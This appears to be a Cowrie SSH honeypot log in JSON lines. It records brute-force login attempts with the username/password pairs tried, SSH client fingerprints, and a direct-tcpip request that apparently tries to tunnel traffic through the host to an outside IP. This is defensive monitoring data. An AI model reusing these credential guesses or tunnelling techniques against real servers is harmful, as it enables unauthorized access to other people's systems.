{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:19:37.346203Z","src_ip":"212.227.235.229","session":"576b33ccfcd2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T10:19:37.777372Z","src_ip":"212.227.235.229","session":"576b33ccfcd2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:19:38.880925Z","src_ip":"212.227.235.229","session":"576b33ccfcd2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35784,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1b2332b6acd","protocol":"ssh","message":"New connection: 212.227.235.229:35784 (1.2.3.4:22) [session: c1b2332b6acd]","sensor":"my-vps","timestamp":"2025-09-09T10:19:38.981361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:19:38.982452Z","src_ip":"212.227.235.229","session":"c1b2332b6acd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:19:39.082916Z","src_ip":"212.227.235.229","session":"c1b2332b6acd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:19:39.544056Z","src_ip":"212.227.235.229","session":"c1b2332b6acd"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:19:39.645205Z","src_ip":"212.227.235.229","session":"012dc427c34f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:19:39.648350Z","src_ip":"212.227.235.229","session":"c1b2332b6acd"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.167.72","src_port":6103,"dst_ip":"1.2.3.4","dst_port":22,"session":"133d30aef2d5","protocol":"ssh","message":"New connection: 170.64.167.72:6103 (1.2.3.4:22) [session: 133d30aef2d5]","sensor":"my-vps","timestamp":"2025-09-09T10:19:59.980644Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-09-09T10:20:00.292848Z","src_ip":"170.64.167.72","session":"133d30aef2d5"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-09T10:20:00.591090Z","src_ip":"170.64.167.72","session":"133d30aef2d5"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-09T10:20:03.845389Z","src_ip":"170.64.167.72","session":"133d30aef2d5"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:20:03.847646Z","src_ip":"170.64.167.72","session":"133d30aef2d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43758,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e6bb1cd9953","protocol":"ssh","message":"New connection: 212.227.235.229:43758 (1.2.3.4:22) [session: 1e6bb1cd9953]","sensor":"my-vps","timestamp":"2025-09-09T10:20:08.516816Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:20:08.523770Z","src_ip":"212.227.235.229","session":"1e6bb1cd9953"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:20:08.781652Z","src_ip":"212.227.235.229","session":"1e6bb1cd9953"}
{"eventid":"cowrie.login.failed","username":"deployer","password":"password1","message":"login attempt [deployer/password1] failed","sensor":"my-vps","timestamp":"2025-09-09T10:20:09.866882Z","src_ip":"212.227.235.229","session":"1e6bb1cd9953"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:20:11.130440Z","src_ip":"212.227.235.229","session":"1e6bb1cd9953"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35798,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2d8cfee0b76","protocol":"ssh","message":"New connection: 212.227.235.229:35798 (1.2.3.4:22) [session: c2d8cfee0b76]","sensor":"my-vps","timestamp":"2025-09-09T10:20:37.823353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:20:37.828642Z","src_ip":"212.227.235.229","session":"c2d8cfee0b76"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:20:37.926166Z","src_ip":"212.227.235.229","session":"c2d8cfee0b76"}
{"eventid":"cowrie.login.failed","username":"gaoyuan","password":"Password1","message":"login attempt [gaoyuan/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T10:20:38.366800Z","src_ip":"212.227.235.229","session":"c2d8cfee0b76"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:20:39.462557Z","src_ip":"212.227.235.229","session":"c2d8cfee0b76"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42186,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec42eafcfb32","protocol":"ssh","message":"New connection: 212.227.235.229:42186 (1.2.3.4:22) [session: ec42eafcfb32]","sensor":"my-vps","timestamp":"2025-09-09T10:21:42.771150Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35800,"dst_ip":"1.2.3.4","dst_port":22,"session":"89e7905a5109","protocol":"ssh","message":"New connection: 212.227.235.229:35800 (1.2.3.4:22) [session: 89e7905a5109]","sensor":"my-vps","timestamp":"2025-09-09T10:22:12.766109Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54352,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b5f77bee17f","protocol":"ssh","message":"New connection: 217.72.205.35:54352 (1.2.3.4:22) [session: 7b5f77bee17f]","sensor":"my-vps","timestamp":"2025-09-09T10:22:12.766724Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":2880,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fae0e147d54","protocol":"ssh","message":"New connection: 212.227.235.229:2880 (1.2.3.4:22) [session: 2fae0e147d54]","sensor":"my-vps","timestamp":"2025-09-09T10:22:12.767245Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3216,"dst_ip":"1.2.3.4","dst_port":22,"session":"03658489a2e2","protocol":"ssh","message":"New connection: 212.227.235.229:3216 (1.2.3.4:22) [session: 03658489a2e2]","sensor":"my-vps","timestamp":"2025-09-09T10:22:12.767717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:22:12.768670Z","src_ip":"212.227.235.229","session":"ec42eafcfb32"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:22:12.769110Z","src_ip":"212.227.235.229","session":"89e7905a5109"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:22:12.769688Z","src_ip":"217.72.205.35","session":"7b5f77bee17f"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:22:12.770340Z","src_ip":"212.227.235.229","session":"2fae0e147d54"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T10:22:12.770825Z","src_ip":"212.227.235.229","session":"03658489a2e2"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:22:12.771301Z","src_ip":"212.227.235.229","session":"ec42eafcfb32"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:22:12.771724Z","src_ip":"212.227.235.229","session":"89e7905a5109"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T10:22:12.928888Z","src_ip":"212.227.235.229","session":"03658489a2e2"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:22:13.421824Z","src_ip":"212.227.235.229","session":"03658489a2e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T10:22:13.580798Z","session":"03658489a2e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35814,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8688b5856cb","protocol":"ssh","message":"New connection: 212.227.235.229:35814 (1.2.3.4:22) [session: e8688b5856cb]","sensor":"my-vps","timestamp":"2025-09-09T10:22:44.171166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:22:44.177608Z","src_ip":"212.227.235.229","session":"e8688b5856cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:22:44.277436Z","src_ip":"212.227.235.229","session":"e8688b5856cb"}
{"eventid":"cowrie.login.failed","username":"poc","password":"poc","message":"login attempt [poc/poc] failed","sensor":"my-vps","timestamp":"2025-09-09T10:22:44.665788Z","src_ip":"212.227.235.229","session":"e8688b5856cb"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:22:45.759729Z","src_ip":"212.227.235.229","session":"e8688b5856cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40618,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c095a0d4fed","protocol":"ssh","message":"New connection: 212.227.235.229:40618 (1.2.3.4:22) [session: 9c095a0d4fed]","sensor":"my-vps","timestamp":"2025-09-09T10:22:58.714703Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:22:58.719441Z","src_ip":"212.227.235.229","session":"9c095a0d4fed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:22:58.977484Z","src_ip":"212.227.235.229","session":"9c095a0d4fed"}
{"eventid":"cowrie.login.failed","username":"miner","password":"qwerty","message":"login attempt [miner/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T10:23:00.056398Z","src_ip":"212.227.235.229","session":"9c095a0d4fed"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:23:01.316017Z","src_ip":"212.227.235.229","session":"9c095a0d4fed"}
{"eventid":"cowrie.session.closed","duration":"69.3","message":"Connection lost after 69.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:23:22.105518Z","src_ip":"212.227.235.229","session":"03658489a2e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35820,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5d0ec3f3a42","protocol":"ssh","message":"New connection: 212.227.235.229:35820 (1.2.3.4:22) [session: b5d0ec3f3a42]","sensor":"my-vps","timestamp":"2025-09-09T10:23:53.321449Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39052,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2f7cf858acf","protocol":"ssh","message":"New connection: 212.227.235.229:39052 (1.2.3.4:22) [session: d2f7cf858acf]","sensor":"my-vps","timestamp":"2025-09-09T10:24:59.691309Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35828,"dst_ip":"1.2.3.4","dst_port":22,"session":"97d1933923c3","protocol":"ssh","message":"New connection: 212.227.235.229:35828 (1.2.3.4:22) [session: 97d1933923c3]","sensor":"my-vps","timestamp":"2025-09-09T10:26:34.645092Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37486,"dst_ip":"1.2.3.4","dst_port":22,"session":"88f8864a5052","protocol":"ssh","message":"New connection: 212.227.235.229:37486 (1.2.3.4:22) [session: 88f8864a5052]","sensor":"my-vps","timestamp":"2025-09-09T10:27:56.368126Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35916,"dst_ip":"1.2.3.4","dst_port":22,"session":"f091eb35cd41","protocol":"ssh","message":"New connection: 212.227.235.229:35916 (1.2.3.4:22) [session: f091eb35cd41]","sensor":"my-vps","timestamp":"2025-09-09T10:29:49.579507Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57684,"dst_ip":"1.2.3.4","dst_port":22,"session":"375bb53f4ab2","protocol":"ssh","message":"New connection: 217.72.205.35:57684 (1.2.3.4:22) [session: 375bb53f4ab2]","sensor":"my-vps","timestamp":"2025-09-09T10:29:49.581023Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34348,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4d580bd647d","protocol":"ssh","message":"New connection: 212.227.235.229:34348 (1.2.3.4:22) [session: a4d580bd647d]","sensor":"my-vps","timestamp":"2025-09-09T10:29:49.583410Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36416,"dst_ip":"1.2.3.4","dst_port":22,"session":"34c4b475efc1","protocol":"ssh","message":"New connection: 212.227.235.229:36416 (1.2.3.4:22) [session: 34c4b475efc1]","sensor":"my-vps","timestamp":"2025-09-09T10:29:49.583877Z"}
